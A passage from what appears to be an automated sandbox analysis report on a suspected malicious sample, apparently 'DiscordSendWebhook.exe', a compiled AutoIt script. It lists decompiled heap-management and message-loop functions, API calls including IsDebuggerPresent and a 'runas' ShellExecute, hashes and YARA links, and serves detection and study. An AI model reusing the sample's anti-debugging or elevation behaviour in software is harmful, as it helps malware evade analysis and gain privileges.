                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                                      			E0040D438(long* _a4, signed int _a8) {
				long _t24;
				signed int _t27;
				struct _CRITICAL_SECTION* _t34;
				signed int _t38;
				long* _t39;
				intOrPtr _t40;

				_t39 = _a4;
				_t2 =  &(_t39[8]); // 0x20
				_t34 = _t2;
				EnterCriticalSection(_t34);
				_t38 = _a8;
				if(_t38 != 0xffffffff) {
					if(_t38 >= _t39[2]) {
						_t27 = _t39[1] + _t38;
						_t39[2] = _t27;
						_t39[3] = HeapReAlloc( *0x417008, 8, _t39[3], _t27 << 2);
					}
					if( *((intOrPtr*)(_t39[3] + _t38 * 4)) == 0) {
						 *((intOrPtr*)(_t39[3] + _t38 * 4)) = HeapAlloc( *0x417008, 8,  *_t39);
					} else {
						_t24 = _t39[5];
						if(_t24 != 0) {
							 *_t24(_t38);
						}
					}
					_t40 =  *((intOrPtr*)(_t39[3] + _t38 * 4));
				} else {
					_t4 =  &(_t39[4]); // 0x10
					_t40 = E0040DB12(_t4,  *_t39 + 8);
				}
				LeaveCriticalSection(_t34);
				return _t40;
			}









                                                                                                                                                                      0x0040d43a
                                                                                                                                                                      0x0040d43f
                                                                                                                                                                      0x0040d43f
                                                                                                                                                                      0x0040d443
                                                                                                                                                                      0x0040d449
                                                                                                                                                                      0x0040d450
                                                                                                                                                                      0x0040d46a
                                                                                                                                                                      0x0040d46f
                                                                                                                                                                      0x0040d471
                                                                                                                                                                      0x0040d489
                                                                                                                                                                      0x0040d489
                                                                                                                                                                      0x0040d493
                                                                                                                                                                      0x0040d4b4
                                                                                                                                                                      0x0040d495
                                                                                                                                                                      0x0040d495
                                                                                                                                                                      0x0040d49a
                                                                                                                                                                      0x0040d49d
                                                                                                                                                                      0x0040d49d
                                                                                                                                                                      0x0040d49a
                                                                                                                                                                      0x0040d4ba
                                                                                                                                                                      0x0040d452
                                                                                                                                                                      0x0040d458
                                                                                                                                                                      0x0040d463
                                                                                                                                                                      0x0040d463
                                                                                                                                                                      0x0040d4be
                                                                                                                                                                      0x0040d4c9

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
                                                                                                                                                                      • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D483
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE
                                                                                                                                                                        • Part of subcall function 0040DB12: HeapAlloc.KERNEL32(00000008,00000000,0040D38C,00417608,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 830345296-0
                                                                                                                                                                      • Opcode ID: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
                                                                                                                                                                      • Instruction ID: a304a92e3806a45bcf6d327fe86cdfb5e6d5534298f9acb62e815e22c79c963c
                                                                                                                                                                      • Opcode Fuzzy Hash: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
                                                                                                                                                                      • Instruction Fuzzy Hash: 30112B32604700AFC3208FA8EC40D56B7FAFF58765B15892AE996E36A0C734F804CB65
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D67D, Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040D67D(void** _a4) {
				void* _t9;
				void* _t10;
				struct _CRITICAL_SECTION* _t11;
				void** _t15;
				void* _t16;
				void* _t17;

				_t15 = _a4;
				if(_t15[7] != 0) {
					_t3 =  &(_t15[8]); // 0x20
					EnterCriticalSection(_t3);
				}
				_t9 = _t15[1];
				if(_t9 != 0) {
					do {
						_t17 =  *_t9;
						HeapFree( *0x417008, 0, _t9);
						_t9 = _t17;
					} while (_t17 != 0);
				}
				_t10 =  *_t15;
				if(_t10 != 0) {
					do {
						_t16 =  *_t10;
						HeapFree( *0x417008, 0, _t10);
						_t10 = _t16;
					} while (_t16 != 0);
				}
				 *_t15 = 0;
				_t15[1] = 0;
				_t15[3] = 0;
				if(_t15[7] != 0) {
					_t8 =  &(_t15[8]); // 0x20
					_t11 = _t8;
					LeaveCriticalSection(_t11);
					return _t11;
				}
				return _t10;
			}









                                                                                                                                                                      0x0040d680
                                                                                                                                                                      0x0040d689
                                                                                                                                                                      0x0040d68b
                                                                                                                                                                      0x0040d68f
                                                                                                                                                                      0x0040d68f
                                                                                                                                                                      0x0040d695
                                                                                                                                                                      0x0040d69a
                                                                                                                                                                      0x0040d69c
                                                                                                                                                                      0x0040d69c
                                                                                                                                                                      0x0040d6a6
                                                                                                                                                                      0x0040d6ac
                                                                                                                                                                      0x0040d6ae
                                                                                                                                                                      0x0040d69c
                                                                                                                                                                      0x0040d6b2
                                                                                                                                                                      0x0040d6b6
                                                                                                                                                                      0x0040d6b8
                                                                                                                                                                      0x0040d6b8
                                                                                                                                                                      0x0040d6c2
                                                                                                                                                                      0x0040d6c8
                                                                                                                                                                      0x0040d6ca
                                                                                                                                                                      0x0040d6b8
                                                                                                                                                                      0x0040d6ce
                                                                                                                                                                      0x0040d6d0
                                                                                                                                                                      0x0040d6d3
                                                                                                                                                                      0x0040d6d9
                                                                                                                                                                      0x0040d6db
                                                                                                                                                                      0x0040d6db
                                                                                                                                                                      0x0040d6df
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d6df
                                                                                                                                                                      0x0040d6e8

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D68F
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F), ref: 0040D6A6
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F), ref: 0040D6C2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D6DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1298188129-0
                                                                                                                                                                      • Opcode ID: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
                                                                                                                                                                      • Instruction ID: ccb09d183470463af25dc63fc94d1cebb037c249e32c06969674a21ae1653042
                                                                                                                                                                      • Opcode Fuzzy Hash: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
                                                                                                                                                                      • Instruction Fuzzy Hash: BF017C75A0261AEFC7108F95E904967BBBCFF08750301843AE80897654C731E864CFE8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409E6F, Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                      			E00409E6F(void* _a4) {
				void* __ebp;
				void* _t7;
				void* _t12;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t24;

				_t20 = _a4;
				_t27 = _t20;
				if(_t20 != 0) {
					_push(_t24);
					E0040A0BA(_t19, _t27, _t20);
					E0040D8E6(_t24,  *((intOrPtr*)(_t20 + 0x38)));
					HeapFree( *0x417008, 0,  *(_t20 + 4));
					HeapFree( *0x417008, 0,  *(_t20 + 0xc));
					_t12 =  *(_t20 + 0x34);
					if(_t12 == 0) {
						L5:
						 *((intOrPtr*)( *((intOrPtr*)(_t20 + 0x30)))) = 0;
						return HeapFree( *0x417008, 0, _t20);
					}
					do {
						_t22 =  *_t12;
						HeapFree( *0x417008, 0, _t12);
						_t12 = _t22;
					} while (_t22 != 0);
					goto L5;
				}
				return _t7;
			}










                                                                                                                                                                      0x00409e70
                                                                                                                                                                      0x00409e74
                                                                                                                                                                      0x00409e76
                                                                                                                                                                      0x00409e79
                                                                                                                                                                      0x00409e7b
                                                                                                                                                                      0x00409e83
                                                                                                                                                                      0x00409e9a
                                                                                                                                                                      0x00409ea6
                                                                                                                                                                      0x00409ea8
                                                                                                                                                                      0x00409ead
                                                                                                                                                                      0x00409ec3
                                                                                                                                                                      0x00409ec8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409ed3
                                                                                                                                                                      0x00409eb0
                                                                                                                                                                      0x00409eb0
                                                                                                                                                                      0x00409eba
                                                                                                                                                                      0x00409ebc
                                                                                                                                                                      0x00409ebe
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409ec2
                                                                                                                                                                      0x00409ed5

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040A0BA: memset.MSVCRT ref: 0040A122
                                                                                                                                                                        • Part of subcall function 0040D8E6: EnterCriticalSection.KERNEL32(0041761C,00000200,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D8FA
                                                                                                                                                                        • Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004), ref: 0040D948
                                                                                                                                                                        • Part of subcall function 0040D8E6: LeaveCriticalSection.KERNEL32(0041761C,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D94F
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409E9A
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4254243056-0
                                                                                                                                                                      • Opcode ID: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
                                                                                                                                                                      • Instruction ID: bfb960cb52ae9f1737c5edf5dab89cb24d0a80b98fb865d44a1203debf2c4dae
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
                                                                                                                                                                      • Instruction Fuzzy Hash: 40F0FF31205609BFC6126F5AED40D57BF7DFF5A7983464136B404626B0C732EC619AA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Analysis Process: DiscordSendWebhook.exe PID: 5440 Parent PID: 4084 DiscordSendWebhook.exeCOMMON

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00373B4C, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00373B7A
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00373B8C
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,004362F8,004362E0,?,?), ref: 00373BFD
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                        • Part of subcall function 00380A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00373C26,004362F8,?,?,?), ref: 00380ACE
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00373C81
                                                                                                                                                                      • MessageBoxA.USER32 ref: 003AD4BC
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,004362F8,?,?,?), ref: 003AD4F4
                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00425D40,004362F8,?,?,?), ref: 003AD57A
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 003AD581
                                                                                                                                                                        • Part of subcall function 00373A58: GetSysColorBrush.USER32(0000000F), ref: 00373A62
                                                                                                                                                                        • Part of subcall function 00373A58: LoadCursorW.USER32(00000000,00007F00), ref: 00373A71
                                                                                                                                                                        • Part of subcall function 00373A58: LoadIconW.USER32(00000063), ref: 00373A88
                                                                                                                                                                        • Part of subcall function 00373A58: LoadIconW.USER32(000000A4), ref: 00373A9A
                                                                                                                                                                        • Part of subcall function 00373A58: LoadIconW.USER32(000000A2), ref: 00373AAC
                                                                                                                                                                        • Part of subcall function 00373A58: LoadImageW.USER32 ref: 00373AD2
                                                                                                                                                                        • Part of subcall function 00373A58: RegisterClassExW.USER32 ref: 00373B28
                                                                                                                                                                        • Part of subcall function 003739E7: CreateWindowExW.USER32 ref: 00373A15
                                                                                                                                                                        • Part of subcall function 003739E7: CreateWindowExW.USER32 ref: 00373A36
                                                                                                                                                                        • Part of subcall function 003739E7: ShowWindow.USER32(00000000,?,?), ref: 00373A4A
                                                                                                                                                                        • Part of subcall function 003739E7: ShowWindow.USER32(00000000,?,?), ref: 00373A53
                                                                                                                                                                        • Part of subcall function 003743DB: _memset.LIBCMT ref: 00374401
                                                                                                                                                                        • Part of subcall function 003743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003744A6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%@
                                                                                                                                                                      • API String ID: 529118366-3734864229
                                                                                                                                                                      • Opcode ID: 00bf0931eac07e62c81e15b5e6eff4068c400dda01c918c09bf2e071adc29e88
                                                                                                                                                                      • Instruction ID: b35756c95ae89f5b0cb425397b7115cd6a115c2bcc5ef0e22b39630cdc6a8238
                                                                                                                                                                      • Opcode Fuzzy Hash: 00bf0931eac07e62c81e15b5e6eff4068c400dda01c918c09bf2e071adc29e88
                                                                                                                                                                      • Instruction Fuzzy Hash: F651EB7090424ABECB23BBB4DC45AFE7B78AF09300F15C0B5F859AA151DB7C4605DB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374AFE, Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00374B2B
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,003FFAEC,00000000,00000000,?), ref: 00374BF8
                                                                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00374BFF
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00374C45
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00374C50
                                                                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00374C81
                                                                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00374C8D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1986165174-0
                                                                                                                                                                      • Opcode ID: 4e1cc94adf35e528777e129b953398f906fc14c0ceecc0198b70aca460b8af83
                                                                                                                                                                      • Instruction ID: 915af1bc8f85bfbaae1eafa75a20c8d1150f21d0e318341de1cc887a438015a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e1cc94adf35e528777e129b953398f906fc14c0ceecc0198b70aca460b8af83
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A91B33154A7C0DEC733CB6885511AABFE8AF6A300B44899ED0CF97E01D328F948D769
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CDA5D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003CDAC5
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003CDAFB
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003CDB0C
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003CDB8E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                      • String ID: ,,@$DllGetClassObject
                                                                                                                                                                      • API String ID: 753597075-3122405551
                                                                                                                                                                      • Opcode ID: 0f632a752c704d4714b56d8cf9d96ca92129981248f4a5062ddb3f9a5c13d8b3
                                                                                                                                                                      • Instruction ID: 4715f9fd684f32901387b13410dd6de93389ad7a416bf8089eaa89dc022a9166
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f632a752c704d4714b56d8cf9d96ca92129981248f4a5062ddb3f9a5c13d8b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F4128B1600208AFDB16CF54C884BAA7BA9EF44350F1681AEB905DF245D7B1DD44DBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037FE40, Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                      • String ID: prC$%@
                                                                                                                                                                      • API String ID: 3964851224-2906495908
                                                                                                                                                                      • Opcode ID: a3d514b1670aaad7e17469c6f5076d99e45d6b7c64f5d7b3ea53cc97759c1a19
                                                                                                                                                                      • Instruction ID: 2a165ebcfd315511c17476cc351dedeacc4ced86ce324d73db94e6033da50c53
                                                                                                                                                                      • Opcode Fuzzy Hash: a3d514b1670aaad7e17469c6f5076d99e45d6b7c64f5d7b3ea53cc97759c1a19
                                                                                                                                                                      • Instruction Fuzzy Hash: 72929A706083418FD766EF24C480B6AB7E4BF84304F1589ADF98A8B752D775EC49CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00380B30, Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PeekMessageW.USER32 ref: 00380BBB
                                                                                                                                                                      • timeGetTime.WINMM ref: 00380E76
                                                                                                                                                                      • PeekMessageW.USER32 ref: 00380FB3
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00380FC7
                                                                                                                                                                      • DispatchMessageW.USER32 ref: 00380FD5
                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00380FDF
                                                                                                                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 0038105A
                                                                                                                                                                      • DestroyWindow.USER32 ref: 00381066
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00381080
                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 003B52AD
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 003B608A
                                                                                                                                                                      • DispatchMessageW.USER32 ref: 003B6098
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003B60AC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                                                                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prC$prC$prC$prC
                                                                                                                                                                      • API String ID: 4003667617-2728770294
                                                                                                                                                                      • Opcode ID: bebf655363f700d80a30aa66ad1ddb12a2bf4b93d7bd2b051b1a5ff36b4e0004
                                                                                                                                                                      • Instruction ID: 4a9ff3a076e87604d2007f4f8211f5955ac33f055b850c93ad04523ea6a01a2a
                                                                                                                                                                      • Opcode Fuzzy Hash: bebf655363f700d80a30aa66ad1ddb12a2bf4b93d7bd2b051b1a5ff36b4e0004
                                                                                                                                                                      • Instruction Fuzzy Hash: A3B2E470608741DFD73ADF24C884BAAB7E4BF84308F15895DE59A8B691CB75E844CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00373015, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00373074
                                                                                                                                                                      • RegisterClassExW.USER32 ref: 0037309E
                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003730AF
                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 003730CC
                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003730DC
                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 003730F2
                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00373101
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
